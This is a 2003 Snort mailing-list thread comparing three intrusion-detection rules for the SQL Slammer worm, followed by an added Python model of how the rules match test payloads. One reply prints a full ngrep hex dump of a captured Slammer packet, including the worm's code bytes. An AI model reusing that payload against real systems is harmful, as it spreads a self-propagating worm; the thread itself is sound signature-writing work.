[Snort-sigs] SQL Slammer Worm Signature
M***@Asia.ING.com
2003-02-10 07:20:13 UTC
Someone formerly posted the rule for capturing SQL slammer as:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)

which differs from the one found in snort.org (snortrules-current.tar.gz):

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)

Others suggest this rule:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)

How come there are so many versions? Though the header part is identical,
the 'meat' is totally different!

Thanks,
Michael

John Sage
2003-02-10 17:06:04 UTC
Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)
How come there are so many versions? Though the header part is identical,
the 'meat' is totally different!
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown;
sid:9998; rev:1;)
A hex search of packet content:

[***@sparky /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x0401010101010101" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: 0x0401010101010101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
.....................................................................................
...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<***@...........)
.......E.j..E.P1.Qf..x.Q.E.P.E.P....
#
<snip>
exit
Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm propagation
attempt"; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|";
content:"sock"; content:"send"; reference:bugtraq,5310;
classtype:misc-attack; reference:bugtraq,5311;
reference:url,vil.nai.com/vil/content/v_99992.htm; sid:2003; rev:2;)
Another hex search:

[***@sparky /storage/snort/old_snorts/013003]# ngrep -eXt -I
snort-0130\@1918.log "0x81F10301049B81F101" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: 0x81F10301049B81F101
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
.....................................................................................
...............B.........p.B.p.B........h...B.....1...P..5....P..Qh.dllhel32hkernQhou
nthickChGetTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt
.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<***@...........)
.......E.j..E.P1.Qf..x.Q.E.P.E.P....
#
<snip>
exit
Post by M***@Asia.ING.com
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm
Activity"; content:
"dllhel32hkernQhounthickChGetTf"; classtype:bad-unknown;)
Note that this queries for ASCII content, not hex.

[***@sparky /storage/snort/old_snorts/013003]# ngrep -ext -I
snort-0130\@1918.log "dllhel32hkernQhounthickChGetTf" "dst port 1434"
input: snort-***@1918.log
filter: ip and ( dst port 1434 )
match: dllhel32hkernQhounthickChGetTf
#
U 2003/01/30 20:10:41.760045 217.58.216.50:2490 -> 12.82.132.120:1434
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 dc c9 b0 42 eb 0e 01 01 01 01 01 01 01 70 ae ....B.........p.
42 01 70 ae 42 90 90 90 90 90 90 90 90 68 dc c9 B.p.B........h..
b0 42 b8 01 01 01 01 31 c9 b1 18 50 e2 fd 35 01 .B.....1...P..5.
01 01 05 50 89 e5 51 68 2e 64 6c 6c 68 65 6c 33 ...P..Qh.dllhel3
32 68 6b 65 72 6e 51 68 6f 75 6e 74 68 69 63 6b 2hkernQhounthick
43 68 47 65 74 54 66 b9 6c 6c 51 68 33 32 2e 64 ChGetTf.llQh32.d
68 77 73 32 5f 66 b9 65 74 51 68 73 6f 63 6b 66 hws2_f.etQhsockf
b9 74 6f 51 68 73 65 6e 64 be 18 10 ae 42 8d 45 .toQhsend....B.E
d4 50 ff 16 50 8d 45 e0 50 8d 45 f0 50 ff 16 50 .P..P.E.P.E.P..P
be 10 10 ae 42 8b 1e 8b 03 3d 55 8b ec 51 74 05 ....B....=U..Qt.
be 1c 10 ae 42 ff 16 ff d0 31 c9 51 51 50 81 f1 ....B....1.QQP..
03 01 04 9b 81 f1 01 01 01 01 51 8d 45 cc 50 8b ..........Q.E.P.
45 c0 50 ff 16 6a 11 6a 02 6a 02 ff d0 50 8d 45 E.P..j.j.j...P.E
c4 50 8b 45 c0 50 ff 16 89 c6 09 db 81 f3 3c 61 .P.E.P........<a
d9 ff 8b 45 b4 8d 0c 40 8d 14 88 c1 e2 04 01 c2 ***@........
c1 e2 08 29 c2 8d 04 90 01 d8 89 45 b4 6a 10 8d ...).......E.j..
45 b0 50 31 c9 51 66 81 f1 78 01 51 8d 45 03 50 E.P1.Qf..x.Q.E.P
8b 45 ac 50 ff d6 eb ca .E.P....
#
<snip>


- John
--
"You are in a little maze of twisty passages, all different."

PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800 4EF6 5FC8 F23D 35A4 F705
M***@Asia.ING.com
2003-02-11 00:09:05 UTC
Thanks for your detailed reply. I am now clear from your 'ngrep' output that
different analysts tend to extract different parts of the worm for building a
signature. I am just wondering about the first one, with content equal to "04 01
01 01 01 01 01 01": will that be too general to judge from this pattern that
it is the SQL Slammer worm? Does that mean no other worms will adopt this
pattern? In fact, I would like to know which part of the worm I should
extract for building a Snort signature?

Thanks & regards,
Michael

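Added example (not from the thread or from Snort): a small Python model of how the three rules quoted above match or fail against UDP/1434 payloads, to put a concrete shape on Michael's question about whether `|04 01 01 01 01 01 01 01|` alone is too general. The payloads are constructed and contain only the byte sequences the rules test for (taken from the fragments John's ngrep output shows), not the worm itself; `depth:1` is modelled as "look at the first byte only".

```python
# Model of the three Snort rules quoted in the thread (added example, not Snort
# code). Each function returns True when every content option of that rule matches.

def rule_sid_9998(payload: bytes) -> bool:
    # content:"|04 01 01 01 01 01 01 01|" with no depth/offset: anywhere in payload
    return b"\x04\x01\x01\x01\x01\x01\x01\x01" in payload

def rule_sid_2003(payload: bytes) -> bool:
    # content:"|04|"; depth:1  -> only the first byte is examined for 0x04.
    # The remaining content options have no depth, so they may match anywhere,
    # and all of them must match (content options are ANDed).
    return (payload[:1] == b"\x04"
            and b"\x81\xf1\x03\x01\x04\x9b\x81\xf1\x01" in payload
            and b"sock" in payload
            and b"send" in payload)

def rule_ascii_string(payload: bytes) -> bool:
    # The third rule: one ASCII content match, anywhere in the payload
    return b"dllhel32hkernQhounthickChGetTf" in payload

def evaluate(payload: bytes) -> dict:
    return {
        "sid:9998": rule_sid_9998(payload),
        "sid:2003": rule_sid_2003(payload),
        "ascii": rule_ascii_string(payload),
    }

# Constructed payloads (not real captures). SLAMMER_LIKE carries only the
# fragments the rules look for, in the order the thread's hex dump shows them.
SLAMMER_LIKE = (
    b"\x04" + b"\x01" * 96                       # 0x04 then the 0x01 padding run
    + b"Qh.dllhel32hkernQhounthickChGetTf"       # ASCII fragment from the dump
    + b".llQh32.dhws2_f.etQhsockf.toQhsend"      # carries "sock" and "send"
    + b"\x81\xf1\x03\x01\x04\x9b\x81\xf1\x01"    # the 9-byte hex fragment
)
PADDED_ONLY = b"\x04" + b"\x01" * 31             # same leading bytes, nothing else
MID_PAYLOAD = b"\x00" * 8 + b"\x04" + b"\x01" * 7 + b"\x00" * 8  # not at offset 0

if __name__ == "__main__":
    for name, p in [("slammer-like", SLAMMER_LIKE), ("padded-only", PADDED_ONLY),
                    ("mid-payload", MID_PAYLOAD)]:
        print(f"{name:13s} {evaluate(p)}")
```

Only the first rule fires on the padded-only and mid-payload packets, which is the over-generality Michael is asking about; sid:2003 additionally anchors the 0x04 to offset 0 and requires three more fragments, so it needs all of them before it alerts.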